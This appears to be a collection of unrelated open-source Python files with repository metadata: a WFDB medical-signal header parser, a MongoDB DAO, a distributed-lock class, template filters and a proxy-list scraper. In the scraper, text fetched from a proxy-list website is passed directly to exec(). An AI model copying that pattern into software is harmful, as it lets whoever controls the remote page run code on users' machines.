[float_types, '(', 'counter_freq', False, None, None], # base_counter
[int_types, ' ', 'fs', True, None, None], # sig_len
[(datetime.time,), ' ', 'sig_len', False, None, '00:00:00'], # base_time
[(datetime.date,), ' ', 'base_time', False, None, None], # base_date
]
)
SIGNAL_SPECS = pd.DataFrame(
index=['file_name', 'fmt', 'samps_per_frame', 'skew', 'byte_offset',
'adc_gain', 'baseline', 'units', 'adc_res', 'adc_zero',
'init_value', 'checksum', 'block_size', 'sig_name'],
columns=_SPECIFICATION_COLUMNS,
dtype='object',
data=[[(str,), '', None, True, None, None], # file_name
[(str,), ' ', 'file_name', True, None, None], # fmt
[int_types, 'x', 'fmt', False, 1, None], # samps_per_frame
[int_types, ':', 'fmt', False, None, None], # skew
[int_types, '+', 'fmt', False, None, None], # byte_offset
[float_types, ' ', 'fmt', True, 200., None], # adc_gain
[int_types, '(', 'adc_gain', True, 0, None], # baseline
[(str,), '/', 'adc_gain', True, 'mV', None], # units
[int_types, ' ', 'adc_gain', False, None, 0], # adc_res
[int_types, ' ', 'adc_res', False, None, 0], # adc_zero
[int_types, ' ', 'adc_zero', False, None, None], # init_value
[int_types, ' ', 'init_value', False, None, None], # checksum
[int_types, ' ', 'checksum', False, None, 0], # block_size
[(str,), ' ', 'block_size', False, None, None], # sig_name
]
)
SEGMENT_SPECS = pd.DataFrame(
index=['seg_name', 'seg_len'],
columns=_SPECIFICATION_COLUMNS,
dtype='object',
data=[[(str), '', None, True, None, None], # seg_name
[int_types, ' ', 'seg_name', True, None, None], # seg_len
]
)
# Specifications of all WFDB header fields, except for comments
FIELD_SPECS = pd.concat((RECORD_SPECS, SIGNAL_SPECS, SEGMENT_SPECS))
# Regexp objects for reading headers
# Record line
_rx_record = re.compile(
r'''
[ \t]* (?P<record_name>[-\w]+)
/?(?P<n_seg>\d*)
[ \t]+ (?P<n_sig>\d+)
[ \t]* (?P<fs>\d*\.?\d*)
/*(?P<counter_freq>-?\d*\.?\d*)
\(?(?P<base_counter>-?\d*\.?\d*)\)?
[ \t]* (?P<sig_len>\d*)
[ \t]* (?P<base_time>\d{,2}:?\d{,2}:?\d{,2}\.?\d{,6})
[ \t]* (?P<base_date>\d{,2}/?\d{,2}/?\d{,4})
''', re.VERBOSE)
# Signal line
_rx_signal = re.compile(
r'''
[ \t]* (?P<file_name>~?[-\w]*\.?[\w]*)
[ \t]+ (?P<fmt>\d+)
x?(?P<samps_per_frame>\d*)
:?(?P<skew>\d*)
\+?(?P<byte_offset>\d*)
[ \t]* (?P<adc_gain>-?\d*\.?\d*e?[\+-]?\d*)
\(?(?P<baseline>-?\d*)\)?
/?(?P<units>[\w\^\-\?%\/]*)
[ \t]* (?P<adc_res>\d*)
[ \t]* (?P<adc_zero>-?\d*)
[ \t]* (?P<init_value>-?\d*)
[ \t]* (?P<checksum>-?\d*)
[ \t]* (?P<block_size>\d*)
[ \t]* (?P<sig_name>[\S]?[^\t\n\r\f\v]*)
''', re.VERBOSE)
# Segment line
_rx_segment = re.compile(
r'''
[ \t]* (?P<seg_name>[-\w]*~?)
[ \t]+ (?P<seg_len>\d+)
''', re.VERBOSE)
class BaseHeaderMixin(object):
"""
Mixin class with multi-segment header methods. Inherited by Record and
MultiRecord classes.
Attributes
----------
N/A
"""
def get_write_subset(self, spec_type):
"""
Get a set of fields used to write the header; either 'record'
or 'signal' specification fields. Helper function for
`get_write_fields`. Gets the default required fields, the user
defined fields, and their dependencies.
Parameters
----------
spec_type : str
The set of specification fields desired. Either 'record' or
'signal'.
Returns
-------
write_fields : list or dict
For record fields, returns a list of all fields needed. For
signal fields, it returns a dictionary of all fields needed,
with keys = field and value = list of channels that must be
present for the field.
"""
if spec_type == 'record':
write_fields = []
record_specs = RECORD_SPECS.copy()
# Remove the n_seg requirement for single segment items
if not hasattr(self, 'n_seg'):
record_specs.drop('n_seg', inplace=True)
for field in record_specs.index[-1::-1]:
# Continue if the field has already been included
if field in write_fields:
continue
# If the field is required by default or has been
# defined by the user
if (record_specs.loc[field, 'write_required']
or getattr(self, field) is not None):
req_field = field
# Add the field and its recursive dependencies
while req_field is not None:
write_fields.append(req_field)
req_field = record_specs.loc[req_field, 'dependency']
# Add comments if any
if getattr(self, 'comments') is not None:
write_fields.append('comments')
# signal spec field. Need to return a potentially different list for each channel.
elif spec_type == 'signal':
# List of lists for each channel
write_fields = []
signal_specs = SIGNAL_SPECS.copy()
for ch in range(self.n_sig):
# The fields needed for this channel
write_fields_ch = []
for field in signal_specs.index[-1::-1]:
if field in write_fields_ch:
continue
item = getattr(self, field)
# If the field is required by default or has been defined by the user
if signal_specs.loc[field, 'write_required'] or (item is not None and item[ch] is not None):
req_field = field
# Add the field and its recursive dependencies
while req_field is not None:
write_fields_ch.append(req_field)
req_field = signal_specs.loc[req_field, 'dependency']
write_fields.append(write_fields_ch)
# Convert the list of lists to a single dictionary.
# keys = field and value = list of channels in which the
# field is required.
dict_write_fields = {}
# For fields present in any channel:
for field in set([i for write_fields_ch in write_fields for i in write_fields_ch]):
dict_write_fields[field] = []
for ch in range(self.n_sig):
if field in write_fields[ch]:
dict_write_fields[field].append(ch)
write_fields = dict_write_fields
return write_fields
class HeaderMixin(BaseHeaderMixin):
"""
Mixin class with single-segment header methods. Inherited by Record class.
Attributes
----------
N/A
"""
def set_defaults(self):
"""
Set defaults for fields needed to write the header if they have
defaults.
Parameters
----------
N/A
Returns
-------
N/A
Notes
-----
- This is NOT called by `rdheader`. It is only automatically
called by the gateway `wrsamp` for convenience.
- This is also not called by `wrheader` since it is supposed to
be an explicit function.
- This is not responsible for initializing the attributes. That
is done by the constructor.
See also `set_p_features` and `set_d_features`.
"""
rfields, sfields = self.get_write_fields()
for f in rfields:
self.set_default(f)
for f in sfields:
self.set_default(f)
def wrheader(self, write_dir=''):
"""
Write a WFDB header file. The signals are not used. Before
writing:
- Get the fields used to write the header for this instance.
- Check each required field.
- Check that the fields are cohesive with one another.
Parameters
----------
write_dir : str, optional
The output directory in which the header is written.
Returns
-------
N/A
Notes
-----
This function does NOT call `set_defaults`. Essential fields
must be set beforehand.
"""
# Get all the fields used to write the header
# sig_write_fields is a dictionary of
# {field_name:required_channels}
rec_write_fields, sig_write_fields = self.get_write_fields()
# Check the validity of individual fields used to write the header
# Record specification fields (and comments)
for field in rec_write_fields:
self.check_field(field)
# Signal specification fields.
for field in sig_write_fields:
self.check_field(field, required_channels=sig_write_fields[field])
# Check the cohesion of fields used to write the header
self.check_field_cohesion(rec_write_fields, list(sig_write_fields))
# Write the header file using the specified fields
self.wr_header_file(rec_write_fields, sig_write_fields, write_dir)
def get_write_fields(self):
"""
Get the list of fields used to write the header, separating
record and signal specification fields. Returns the default
required fields, the user defined fields, and their dependencies.
Does NOT include `d_signal` or `e_d_signal`.
Parameters
----------
N/A
Returns
-------
rec_write_fields : list
Record specification fields to be written. Includes
'comment' if present.
sig_write_fields : dict
Dictionary of signal specification fields to be written,
with values equal to the channels that need to be present
for each field.
"""
# Record specification fields
rec_write_fields = self.get_write_subset('record')
# Add comments if any
if self.comments != None:
rec_write_fields.append('comments')
# Get required signal fields if signals are present.
self.check_field('n_sig')
if self.n_sig > 0:
sig_write_fields = self.get_write_subset('signal')
else:
sig_write_fields = None
return rec_write_fields, sig_write_fields
def set_default(self, field):
"""
Set the object's attribute to its default value if it is missing
and there is a default. Not responsible for initializing the
attribute. That is done by the constructor.
Parameters
----------
field : str
The desired attribute of the object.
Returns
-------
N/A
"""
# Record specification fields
if field in RECORD_SPECS.index:
# Return if no default to set, or if the field is already
# present.
if RECORD_SPECS.loc[field, 'write_default'] is None or getattr(self, field) is not None:
return
setattr(self, field, RECORD_SPECS.loc[field, 'write_default'])
# Signal specification fields
# Setting entire list default, not filling in blanks in lists.
elif field in SIGNAL_SPECS.index:
# Specific dynamic case
if field == 'file_name' and self.file_name is None:
self.file_name = self.n_sig * [self.record_name + '.dat']
return
item = getattr(self, field)
# Return if no default to set, or if the field is already
# present.
if SIGNAL_SPECS.loc[field, 'write_default'] is None or item is not None:
return
# Set more specific defaults if possible
if field == 'adc_res' and self.fmt is not None:
self.adc_res = _signal._fmt_res(self.fmt)
return
setattr(self, field,
[SIGNAL_SPECS.loc[field, 'write_default']] * self.n_sig)
def check_field_cohesion(self, rec_write_fields, sig_write_fields):
"""
Check the cohesion of fields used to write the header.
Parameters
----------
rec_write_fields : list
List of record specification fields to write.
sig_write_fields : dict
Dictionary of signal specification fields to write, values
being equal to a list of channels to write for each field.
Returns
-------
N/A
"""
# If there are no signal specification fields, there is nothing to check.
if self.n_sig>0:
# The length of all signal specification fields must match n_sig
# even if some of its elements are None.
for f in sig_write_fields:
if len(getattr(self, f)) != self.n_sig:
raise ValueError('The length of field: '+f+' must match field n_sig.')
# Each file_name must correspond to only one fmt, (and only one byte offset if defined).
datfmts = {}
for ch in range(self.n_sig):
if self.file_name[ch] not in datfmts:
datfmts[self.file_name[ch]] = self.fmt[ch]
else:
if datfmts[self.file_name[ch]] != self.fmt[ch]:
raise ValueError('Each file_name (dat file) specified must have the same fmt')
datoffsets = {}
if self.byte_offset is not None:
# At least one byte offset value exists
for ch in range(self.n_sig):
if self.byte_offset[ch] is None:
continue
if self.file_name[ch] not in datoffsets:
datoffsets[self.file_name[ch]] = self.byte_offset[ch]
else:
if datoffsets[self.file_name[ch]] != self.byte_offset[ch]:
raise ValueError('Each file_name (dat file) specified must have the same byte offset')
def wr_header_file(self, rec_write_fields, sig_write_fields, write_dir):
"""
Write a header file using the specified fields. Converts Record
attributes into appropriate WFDB format strings.
Parameters
----------
rec_write_fields : list
List of record specification fields to write.
sig_write_fields : dict
Dictionary of signal specification fields to write, values
being equal to a list of channels to write for each field.
write_dir : str
The directory in which to write the header file.
Returns
-------
N/A
"""
# Create record specification line
record_line = ''
# Traverse the ordered dictionary
for field in RECORD_SPECS.index:
# If the field is being used, add it with its delimiter
if field in rec_write_fields:
string_field = str(getattr(self, field))
# Certain fields need extra processing
if field == 'fs' and isinstance(self.fs, float):
if round(self.fs, 8) == float(int(self.fs)):
string_field = str(int(self.fs))
elif field == 'base_time' and '.' in string_field:
string_field = string_field.rstrip('0')
elif field == 'base_date':
string_field = '/'.join((string_field[8:],
string_field[5:7],
string_field[:4]))
record_line += RECORD_SPECS.loc[field, 'delimiter'] + string_field
# The 'base_counter' field needs to be closed with ')'
if field == 'base_counter':
record_line += ')'
header_lines = [record_line]
# Create signal specification lines (if any) one channel at a time
if self.n_sig > 0:
signal_lines = self.n_sig * ['']
for ch in range(self.n_sig):
# Traverse the signal fields
for field in SIGNAL_SPECS.index:
# If the field is being used, add each of its
# elements with the delimiter to the appropriate
# line
if field in sig_write_fields and ch in sig_write_fields[field]:
signal_lines[ch] += SIGNAL_SPECS.loc[field, 'delimiter'] + str(getattr(self, field)[ch])
# The 'baseline' field needs to be closed with ')'
if field == 'baseline':
signal_lines[ch] += ')'
header_lines += signal_lines
# Create comment lines (if any)
if 'comments' in rec_write_fields:
comment_lines = ['# ' + comment for comment in self.comments]
header_lines += comment_lines
lines_to_file(self.record_name + '.hea', write_dir, header_lines)
class MultiHeaderMixin(BaseHeaderMixin):
"""
Mixin class with multi-segment header methods. Inherited by
MultiRecord class.
Attributes
----------
N/A
"""
def set_defaults(self):
"""
Set defaults for fields needed to write the header if they have
defaults. This is NOT called by rdheader. It is only called by the
gateway wrsamp for convenience. It is also not called by wrheader since
it is supposed to be an explicit function. Not responsible for
initializing the attributes. That is done by the constructor.
Parameters
----------
N/A
Returns
-------
N/A
"""
for field in self.get_write_fields():
self.set_default(field)
def wrheader(self, write_dir=''):
"""
Write a multi-segment WFDB header file. The signals or segments are
not used. Before writing:
- Get the fields used to write the header for this instance.
- Check each required field.
- Check that the fields are cohesive with one another.
Parameters
----------
write_dir : str, optional
The output directory in which the header is written.
Returns
-------
N/A
Notes
-----
This function does NOT call `set_defaults`. Essential fields
must be set beforehand.
"""
# Get all the fields used to write the header
write_fields = self.get_write_fields()
# Check the validity of individual fields used to write the header
for field in write_fields:
self.check_field(field)
# Check the cohesion of fields used to write the header
self.check_field_cohesion()
# Write the header file using the specified fields
self.wr_header_file(write_fields, write_dir)
def get_write_fields(self):
"""
Get the list of fields used to write the multi-segment header.
Parameters
----------
N/A
Returns
-------
write_fields : list
All the default required fields, the user defined fields,
and their dependencies.
"""
# Record specification fields
write_fields = self.get_write_subset('record')
# Segment specification fields are all mandatory
write_fields = write_fields + ['seg_name', 'seg_len']
# Comments
if self.comments !=None:
write_fields.append('comments')
return write_fields
def set_default(self, field):
"""
Set a field to its default value if there is a default.
Parameters
----------
field : str
The desired attribute of the object.
Returns
-------
N/A
"""
# Record specification fields
if field in RECORD_SPECS:
# Return if no default to set, or if the field is already present.
if RECORD_SPECS[field].write_def is None or getattr(self, field) is not None:
return
setattr(self, field, RECORD_SPECS[field].write_def)
def check_field_cohesion(self):
"""
Check the cohesion of fields used to write the header.
Parameters
----------
N/A
Returns
-------
N/A
"""
# The length of seg_name and seg_len must match n_seg
for f in ['seg_name', 'seg_len']:
if len(getattr(self, f)) != self.n_seg:
raise ValueError('The length of field: '+f+' does not match field n_seg.')
# Check the sum of the 'seg_len' fields against 'sig_len'
if np.sum(self.seg_len) != self.sig_len:
raise ValueError("The sum of the 'seg_len' fields do not match the 'sig_len' field")
def wr_header_file(self, write_fields, write_dir):
"""
Write a header file using the specified fields.
Parameters
----------
write_fields : list
All the default required fields, the user defined fields,
and their dependencies.
write_dir : str
The output directory in which the header is written.
Returns
-------
N/A
"""
# Create record specification line
record_line = ''
# Traverse the ordered dictionary
for field in RECORD_SPECS.index:
# If the field is being used, add it with its delimiter
if field in write_fields:
record_line += RECORD_SPECS.loc[field, 'delimiter'] + str(getattr(self, field))
header_lines = [record_line]
# Create segment specification lines
segment_lines = self.n_seg * ['']
# For both fields, add each of its elements with the delimiter
# to the appropriate line
for field in SEGMENT_SPECS.index:
for seg_num in range(self.n_seg):
segment_lines[seg_num] += SEGMENT_SPECS.loc[field, 'delimiter'] + str(getattr(self, field)[seg_num])
header_lines = header_lines + segment_lines
# Create comment lines (if any)
if 'comments' in write_fields:
comment_lines = ['# '+ comment for comment in self.comments]
header_lines += comment_lines
lines_to_file(self.record_name + '.hea', header_lines, write_dir)
def get_sig_segments(self, sig_name=None):
"""
Get a list of the segment numbers that contain a particular signal
(or a dictionary of segment numbers for a list of signals).
Only works if information about the segments has been read in.
Parameters
----------
sig_name : str, list
The name of the signals to be segmented.
Returns
-------
sig_dict : dict
Segments for each desired signal.
sig_segs : list
Segments for the desired signal.
"""
if self.segments is None:
raise Exception("The MultiRecord's segments must be read in before this method is called. ie. Call rdheader() with rsegment_fieldsments=True")
# Default value = all signal names.
if sig_name is None:
sig_name = self.get_sig_name()
if isinstance(sig_name, list):
sig_dict = {}
for sig in sig_name:
sig_dict[sig] = self.get_sig_segments(sig)
return sig_dict
elif isinstance(sig_name, str):
sig_segs = []
for i in range(self.n_seg):
if self.seg_name[i] != '~' and sig_name in self.segments[i].sig_name:
sig_segs.append(i)
return sig_segs
else:
raise TypeError('sig_name must be a string or a list of strings')
def get_sig_name(self):
"""
Get the signal names for the entire record.
Parameters
----------
N/A
Returns
-------
sig_name : str, list
The name of the signals to be segmented.
"""
if self.segments is None:
raise Exception("The MultiRecord's segments must be read in before this method is called. ie. Call rdheader() with rsegment_fieldsments=True")
if self.layout == 'fixed':
for i in range(self.n_seg):
if self.seg_name[i] != '~':
sig_name = self.segments[i].sig_name
break
else:
sig_name = self.segments[0].sig_name
return sig_name
def wfdb_strptime(time_string):
"""
Given a time string in an acceptable WFDB format, return
a datetime.time object.
Valid formats: SS, MM:SS, HH:MM:SS, all with and without microsec.
Parameters
----------
time_string : str
The time to be converted to a datetime.time object.
Returns
-------
datetime.time object
The time converted from str format.
"""
n_colons = time_string.count(':')
if n_colons == 0:
time_fmt = '%S'
elif n_colons == 1:
time_fmt = '%M:%S'
elif n_colons == 2:
time_fmt = '%H:%M:%S'
if '.' in time_string:
time_fmt += '.%f'
return datetime.datetime.strptime(time_string, time_fmt).time()
def _read_header_lines(base_record_name, dir_name, pn_dir):
"""
Read the lines in a local or remote header file.
Parameters
----------
base_record_name : str
The base name of the WFDB record to be read, without any file
extensions.
dir_name : str
The local directory location of the header file. This parameter
is ignored if `pn_dir` is set.
pn_dir : str
Option used to stream data from Physionet. The Physionet
database directory from which to find the required record files.
eg. For record '100' in 'http://physionet.org/content/mitdb'
pn_dir='mitdb'.
Returns
-------
header_lines : list
List of strings corresponding to the header lines.
comment_lines : list
List of strings corresponding to the comment lines.
"""
file_name = base_record_name + '.hea'
# Read local file
if pn_dir is None:
with open(os.path.join(dir_name, file_name), 'r', errors='ignore') as fp:
# Record line followed by signal/segment lines if any
header_lines = []
# Comment lines
comment_lines = []
for line in fp:
line = line.strip()
# Comment line
if line.startswith('#'):
comment_lines.append(line)
# Non-empty non-comment line = header line.
elif line:
# Look for a comment in the line
ci = line.find('#')
if ci > 0:
header_lines.append(line[:ci])
# comment on same line as header line
comment_lines.append(line[ci:])
else:
header_lines.append(line)
# Read online header file
else:
header_lines, comment_lines = download._stream_header(file_name,
pn_dir)
return header_lines, comment_lines
def _parse_record_line(record_line):
"""
Extract fields from a record line string into a dictionary.
Parameters
----------
record_line : str
The name of the record line that will be used to extact fields.
Returns
-------
record_fields : dict
The fields for the given record line.
"""
# Dictionary for record fields
record_fields = {}
# Read string fields from record line
match = _rx_record.match(record_line)
if match is None:
raise HeaderSyntaxError('invalid syntax in record line')
(record_fields['record_name'], record_fields['n_seg'],
record_fields['n_sig'], record_fields['fs'],
record_fields['counter_freq'], record_fields['base_counter'],
record_fields['sig_len'], record_fields['base_time'],
record_fields['base_date']) = match.groups()
for field in RECORD_SPECS.index:
# Replace empty strings with their read defaults (which are
# mostly None)
if record_fields[field] == '':
record_fields[field] = RECORD_SPECS.loc[field, 'read_default']
# Typecast non-empty strings for non-string (numerical/datetime)
# fields
else:
if RECORD_SPECS.loc[field, 'allowed_types'] == int_types:
record_fields[field] = int(record_fields[field])
elif RECORD_SPECS.loc[field, 'allowed_types'] == float_types:
record_fields[field] = float(record_fields[field])
# cast fs to an int if it is close
if field == 'fs':
fs = float(record_fields['fs'])
if round(fs, 8) == float(int(fs)):
fs = int(fs)
record_fields['fs'] = fs
elif field == 'base_time':
record_fields['base_time'] = wfdb_strptime(record_fields['base_time'])
elif field == 'base_date':
record_fields['base_date'] = datetime.datetime.strptime(
record_fields['base_date'], '%d/%m/%Y').date()
# This is not a standard WFDB field, but is useful to set.
if record_fields['base_date'] and record_fields['base_time']:
record_fields['base_datetime'] = datetime.datetime.combine(
record_fields['base_date'], record_fields['base_time'])
return record_fields
def _parse_signal_lines(signal_lines):
"""
Extract fields from a list of signal line strings into a dictionary.
Parameters
----------
signal_lines : list
The name of the signal line that will be used to extact fields.
Returns
-------
signal_fields : dict
The fields for the given signal line.
"""
n_sig = len(signal_lines)
# Dictionary for signal fields
signal_fields = {}
# Each dictionary field is a list
for field in SIGNAL_SPECS.index:
signal_fields[field] = n_sig * [None]
# Read string fields from signal line
for ch in range(n_sig):
match = _rx_signal.match(signal_lines[ch])
if match is None:
raise HeaderSyntaxError('invalid syntax in signal line')
(signal_fields['file_name'][ch], signal_fields['fmt'][ch],
signal_fields['samps_per_frame'][ch], signal_fields['skew'][ch],
signal_fields['byte_offset'][ch], signal_fields['adc_gain'][ch],
signal_fields['baseline'][ch], signal_fields['units'][ch],
signal_fields['adc_res'][ch], signal_fields['adc_zero'][ch],
signal_fields['init_value'][ch], signal_fields['checksum'][ch],
signal_fields['block_size'][ch],
signal_fields['sig_name'][ch]) = match.groups()
for field in SIGNAL_SPECS.index:
# Replace empty strings with their read defaults (which are mostly None)
# Note: Never set a field to None. [None]* n_sig is accurate, indicating
# that different channels can be present or missing.
if signal_fields[field][ch] == '':
signal_fields[field][ch] = SIGNAL_SPECS.loc[field, 'read_default']
# Special case: missing baseline defaults to ADCzero if present
if field == 'baseline' and signal_fields['adc_zero'][ch] != '':
signal_fields['baseline'][ch] = int(signal_fields['adc_zero'][ch])
# Typecast non-empty strings for numerical fields
else:
if SIGNAL_SPECS.loc[field, 'allowed_types'] is int_types:
signal_fields[field][ch] = int(signal_fields[field][ch])
elif SIGNAL_SPECS.loc[field, 'allowed_types'] is float_types:
signal_fields[field][ch] = float(signal_fields[field][ch])
# Special case: adc_gain of 0 means 200
if field == 'adc_gain' and signal_fields['adc_gain'][ch] == 0:
signal_fields['adc_gain'][ch] = 200.
return signal_fields
def _read_segment_lines(segment_lines):
"""
Extract fields from segment line strings into a dictionary.
Parameters
----------
segment_line : list
The name of the segment line that will be used to extact fields.
Returns
-------
segment_fields : dict
The fields for the given segment line.
"""
# Dictionary for segment fields
segment_fields = {}
# Each dictionary field is a list
for field in SEGMENT_SPECS.index:
segment_fields[field] = [None] * len(segment_lines)
# Read string fields from signal line
for i in range(len(segment_lines)):
match = _rx_segment.match(segment_lines[i])
if match is None:
raise HeaderSyntaxError('invalid syntax in segment line')
(segment_fields['seg_name'][i],
segment_fields['seg_len'][i]) = match.groups()
# Typecast strings for numerical field
if field == 'seg_len':
segment_fields['seg_len'][i] = int(segment_fields['seg_len'][i])
return segment_fields
class HeaderSyntaxError(ValueError):
"""Invalid syntax found in a WFDB header file."""
def lines_to_file(file_name, write_dir, lines):
"""
Write each line in a list of strings to a text file.
Parameters
----------
write_dir : str
The output directory in which the header is written.
lines : list
The lines to be written to the text file.
Returns
-------
N/A
"""
f = open(os.path.join(write_dir, file_name), 'w')
for l in lines:
f.write("%s\n" % l)
f.close()
|
MIT-LCP/wfdb-python
|
wfdb/io/_header.py
|
Python
|
mit
| 36,630
|
from app.utils import readable
from pymongo import MongoClient
class WebcomicDao():
def __init__(self):
self.client = MongoClient('mongodb://localhost:27017/')
self.db = self.client.penny
def create_comic(self, comic_id, initial_data):
"""
Creates a new webcomic and returns the Webcomic Object
"""
initial_data['_id'] = comic_id
ret = self.db.webcomics.insert_one(initial_data)
return initial_data
def update_comic(self, comic_id, **kwargs):
ret = self.db.webcomics.update_one({
'_id': comic_id
}, {'$set': kwargs })
return ret
def add_links(self, comic_id, content):
ret = self.db.webcomics.update({
'_id': comic_id
}, {
'$pushAll': {
'links': content
}
})
return ret
def get_comics_ids(self):
"""
Returns list of comic ids
"""
ret = self.db.webcomics.find({})
return [r.get('_id') for r in ret]
def get_comic_by_id(self, comic_id):
"""
Returns comic object from name
"""
ret = self.db.webcomics.find_one({
'_id': comic_id,
'is_active': True
})
return ret
def get_comic_urls(self, comic_id):
"""
Returns list of urls
"""
comic = self.db.webcomics.find_one({
'_id': comic_id
},{'links' : 1})
return [link for link in comic.get('links')]
def get_all_comics_meta_info(self):
"""
Returns list of {
'name': '',
'last_sync': 'time',
'links_count': 'count'
}
"""
comics = []
ret = self.db.webcomics.find({
'is_active': True
}, { '_id': 1, 'name': 1, 'last_sync': 1, 'links_count': 1 })
l = []
for comic in ret:
id = comic.get('_id')
name = comic.get('name')
links_count = comic.get('links_count')
last_sync = readable.from_ts(comic.get('last_sync')) \
if comic.get('last_sync') is not None else 'Never'
comics.append({
'id': id,
'name': name,
'last_sync': last_sync,
'links_count': links_count
})
return comics
|
arpitbbhayani/penny
|
app/dao/items/webcomicDao.py
|
Python
|
mit
| 2,415
|
from __future__ import unicode_literals
from .core.lock import Lock
from .core.errors import *
from .backends.redis_lox_backend import RedisLoxBackend
from .backends.postgres_lox_backend import PostgresLoxBackend
DEFAULT_LOX_CONFIG = {
"backend": {
"redis": "redis://:@localhost:6379/0"
}
}
class Lox(object):
"""
Main API for distributed locking, with schmear.
"""
def __init__(self, name=None, config=None):
# you might want to have multiple of these around, so allow naming each
self.name = name or "Lox"
# configuration: default to redis, for now
if not config:
self.config = DEFAULT_LOX_CONFIG
else:
self.config = config
# will hold a list of locks we're managing here
self.locks = {}
# will hold the lock when used as a context manager
self.context_lock = None
# may want to do lazy connection...
self.connect_backend()
def connect_backend(self):
self.backend = None
if "redis" in self.config.get("backend"):
self.backend = RedisLoxBackend(self.config)
elif "postgres" in self.config.get("backend"):
self.backend = PostgresLoxBackend(self.config)
if not self.backend:
raise BackendConfigException("No backend specified in settings.")
self.backend.connect()
def acquire(self, id=None, expires_seconds=None, retry=False, num_tries=None, retry_interval_seconds=None):
"""
Get a lock with the given ID, using the configured backend provider.
:param id: unique identifier for this lock, within this Lox instance.
:param expires_seconds: Automatically expire (i.e release) the lock after this number of seconds.
Defaults to never expire the lock based on a timer.
:param retry: if the lock cannot be acquired immediately, should we try to acquire it again later?
:param num_tries: try to get this lock this many times before giving up.
:param retry_interval_seconds: wait this number of seconds between retries.
:return: the acquired Lock object
"""
if id and id in self.locks:
raise LockAlreadyAcquiredException("Lock %s cannot be acquired more than once." % id)
lock = Lock(self, id)
self.locks[lock.id] = lock
return lock.acquire(expires_seconds=expires_seconds,
retry=retry,
num_tries=num_tries,
retry_interval_seconds=retry_interval_seconds)
def release(self, id=None):
"""
Release the lock with the given ID.
:param id: unique identifier for this lock, within this Lox instance
:return: the released lock object
"""
if not self.locks:
raise LockNotFoundException("No locks to release")
if id and id not in self.locks:
raise LockNotFoundException("Lock %s not found" % id)
# free it from the instance level tracking
lock = self.locks.pop(id)
return lock.release()
def clear_all(self):
"""
Purge all locks from the backend without releasing them.
This effectively resets the data store.
Should only be used for admin, testing, etc.
"""
for id, lock in self.locks.iteritems():
lock.clear()
self.locks = {}
def __enter__(self):
"""
Use Lox as a context manager.
"""
self.context_lock = self.acquire()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""
Use Lox as a context manager.
"""
self.context_lock.release()
if exc_val:
return False
return self
|
sternb0t/lox
|
lox/lox.py
|
Python
|
mit
| 3,823
|
from okapi.templatetags import headers
from okapi.templatetags.exports import curl, jira
from okapi.templatetags import misc
filters = {
'nl2br': misc.nl2br,
'status_code_class': misc.status_code_class,
'escape_payload': curl.escape_payload,
'headers_as_string': headers.headers_as_string,
'export_curl': curl.export_curl,
'export_jira': jira.export_plain,
}
|
Team-Zeus/okapi
|
okapi/templatetags/__init__.py
|
Python
|
mit
| 387
|
# -*- coding: utf-8 -*-
"""
proxy.py
~~~~~~~~
get proxy list from http://pachong.com
"""
from bs4 import BeautifulSoup
import requests
import re
import socket
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import time
if 'threading' in sys.modules:
del sys.modules['threading']
import gevent
import gevent.monkey
from gevent.pool import Pool
gevent.monkey.patch_all()
IP = re.compile(r'\d{1,3}(?:\.\d{1,3}){3}(?::\d{1,6})?')
def get_real_ip(proxy):
#url = 'http://www.ip.cn/'
#resp = requests.get(url, proxies=proxy, timeout=7, headers={'user-agent': 'curl/7.37.0',})
url = 'http://www.baidu.com/s?wd=ip'
#url = 'http://20140507.ip138.com/ic.asp'
resp = requests.get(url, proxies=proxy, timeout=7, headers={'user-agent': 'chrome',})
#print resp
if resp.status_code != 200:
raise Exception
real_ip = IP.findall(resp.content[resp.content.find('我的ip地址'):])[0]
#real_ip = IP.findall(resp.content)[0]
if proxy:
#print real_ip, proxy['http']
pass
return real_ip
local_ip = get_real_ip({})
def check(proxy):
try:
st = time.time()
real_ip = get_real_ip(proxy)
if not real_ip in proxy['http']:
if real_ip == local_ip:
raise Exception
if real_ip:
#print r, proxy, "\t%dms" % int((time.time() - st)*1000)
proxy['speed'] = int((time.time() - st)*1000)
#print proxy['http']
return proxy
except (requests.exceptions.Timeout, socket.timeout,requests.exceptions.ProxyError):
#print 'timeout'
return None
except Exception as e:
#print str(e)
#print 'Can not connect'
return None
def get_proxy_list_from_gevent(tasks):
proxy_list = []
jobs = []
p = Pool(1000)
for task in tasks:
jobs.append(p.spawn(check, task))
for job in jobs:
proxy = job.get()
if proxy:
proxy_list.append(proxy)
return proxy_list
def get_proxy_list_pachong():
url = 'http://pachong.org/anonymous.html'
res = requests.get(url, timeout=7)
text = res.content
soup = BeautifulSoup(text)
table = [
[cell.text for cell in row('td')] for row in soup('tr')
]
for js in soup('script'):
if 'var' in js.text:
exec ( js.getText().replace('var', '').strip() )
pattern = re.compile(r'write\((.*)\)')
for t in table[1:51]:
t[2] = re.findall(pattern, t[2])[0]
exec('port=%s' % t[2])
t[2] = str(port)
ret = table
jobs = []
for row in ret[1:51]:
if '空闲' in row[5].encode('utf-8'):
proxy = {'http': 'http://%s:%s' % (row[1], row[2])}
proxy['https'] = proxy['http']
jobs.append(proxy)
return jobs
def get_proxy_list_cnproxy():
#soup('table')[0]('tr')[2]('td')
url = 'http://cn-proxy.com/'
resp = requests.get(url, timeout=7)
soup = BeautifulSoup(resp.content)
jobs = []
for table in soup('table'):
for tr in table('tr'):
tds = tr('td')
if len(tds) >= 2:
proxy = {
'http': 'http://%s:%s' % (tds[0].getText(), tds[1].getText()),
'https': 'http://%s:%s' % (tds[0].getText(), tds[1].getText()),
}
jobs.append(proxy)
return jobs
def get_proxy_list_ipcn():
url = 'http://proxy.ipcn.org/proxylist.html'
resp = requests.get(url, headers={'user-agent': 'chrome'}, timeout=7)
jobs = []
for ip in IP.findall(resp.content):
proxy = {
'http': 'http://%s' % ip,
'https': 'http://%s' % ip,
}
jobs.append(proxy)
return jobs
def get_proxy_list_proxy_ru_gaoni():
url = 'http://proxy.com.ru/gaoni/list_%d.html'
jobs = []
for i in xrange(1, 7):
try:
resp = requests.get(url%i, timeout=7)
except:
continue
if resp.status_code != 200:
continue
soup = BeautifulSoup(resp.content)
for table in soup('table'):
for tr in table('tr'):
tds = tr('td')
if len(tds) >= 3:
proxy = {
'http': 'http://%s:%s' % (tds[1].getText(), tds[2].getText()),
'https': 'http://%s:%s' % (tds[1].getText(), tds[2].getText()),
}
jobs.append(proxy)
return jobs
